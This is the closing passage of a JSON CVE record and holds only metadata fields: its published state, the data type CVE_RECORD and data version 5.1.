        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }